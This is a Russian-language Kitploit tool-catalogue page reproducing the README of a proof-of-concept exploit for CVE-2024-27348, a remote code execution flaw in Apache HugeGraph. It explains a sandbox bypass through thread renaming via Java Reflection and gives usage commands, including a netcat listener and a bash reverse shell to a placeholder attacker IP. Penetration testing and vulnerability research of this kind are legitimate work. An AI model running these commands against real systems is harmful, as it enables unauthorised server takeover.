Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-27348-HugeGraph-RCE — Продвинутый Proof of Concept эксплойт для CVE-2024-27348 (Apache HugeGraph RCE) с обходом песочницы HugeSecurityManager через Java Reflection, надежным выполнением полезной нагрузки ProcessBuilder и полным чтением вывода команд для не-слепой эксплуатации. | Kitploit
Инструменты/GitHubGitHub/akelaqe/cve-2024-27348-hugegraph-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubakelaqe/cve-2024-27348-hugegraph-rce

CVE-2024-27348-HugeGraph-RCE

Продвинутый Proof of Concept эксплойт для CVE-2024-27348 (Apache HugeGraph RCE) с обходом песочницы HugeSecurityManager через Java Reflection, надежным выполнением полезной нагрузки ProcessBuilder и полным чтением вывода команд для не-слепой эксплуатации.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 месяцев назадЕщё не проверено

CVE-2024-27348: Apache HugeGraph RCE (Обход расширенной песочницы)

Python 3.x Exploit CVE

Продвинутый, высоконадёжный эксплойт Proof of Concept (PoC) для CVE-2024-27348 (удалённое выполнение кода в Apache HugeGraph Server).

В отличие от многих публичных PoC, которые выполняют команды вслепую или не справляются со сложными полезными нагрузками из-за ограничений Runtime.exec() в Java, этот скрипт разработан для надёжности в реальных сценариях пентеста.

⚠️ Отказ от ответственности

Только для образовательных целей и авторизованного тестирования. Данный инструмент предоставляется исследователям безопасности, пентестерам и системным администраторам для проверки уязвимости в авторизованных средах. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый с помощью этого инструмента.

✨ Особенности и технические улучшения

Данный эксплойт улучшает ранние публичные PoC, решая три критических проблемы:

  1. Обход песочницы HugeSecurityManager: Песочница HugeGraph блокирует выполнение, если имя вызывающего потока содержит gremlin-server-exec-* или task-worker-*. Эта полезная нагрузка использует Java Reflection для динамического переименования потока выполнения в BypassThread перед запуском полезной нагрузки, незаметно обходя менеджер безопасности.
  2. Обработка сложных полезных нагрузок: Вместо Runtime.getRuntime().exec(String), который ломает сложные bash-команды (например, reverse shell) из-за пробелов, этот эксплойт использует ProcessBuilder с правильно отформатированным List<String>. Это позволяет безопасно выполнять сложные полезные нагрузки с кавычками и перенаправлениями.
  3. Полное чтение вывода (не-слепое RCE): Скрипт читает InputStream выполненного процесса с помощью Java Scanner и возвращает фактический вывод команды в JSON-ответе HTTP. Вы видите то же, что и сервер.

⚙️ Требования

  • Python 3.x
  • Библиотека requests

Установите необходимые зависимости:

root@kitploit:~
pip3 install requests

🚀 Использование

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Примеры

  1. Выполнение базовой команды (чтение вывода):
root@kitploit:~
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
  1. Запуск reverse shell: Поскольку полезная нагрузка корректно обрабатывает пробелы и кавычки, вы можете напрямую внедрить стандартный bash reverse shell без необходимости base64-кодирования или промежуточной загрузки:
root@kitploit:~
# На вашей атакующей машине запустите слушатель:
nc -lvnp 4444

# Выполните эксплойт:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

🔍 Детали уязвимости

Сервер Apache HugeGraph предоставляет конечную точку Gremlin API (/gremlin), которая позволяет пользователям отправлять Groovy-скрипты. Из-за недостаточной изоляции (sandbox) в версиях до исправления неаутентифицированный злоумышленник может выполнять произвольные команды операционной системы с помощью Java Reflection.

Скачать инструмент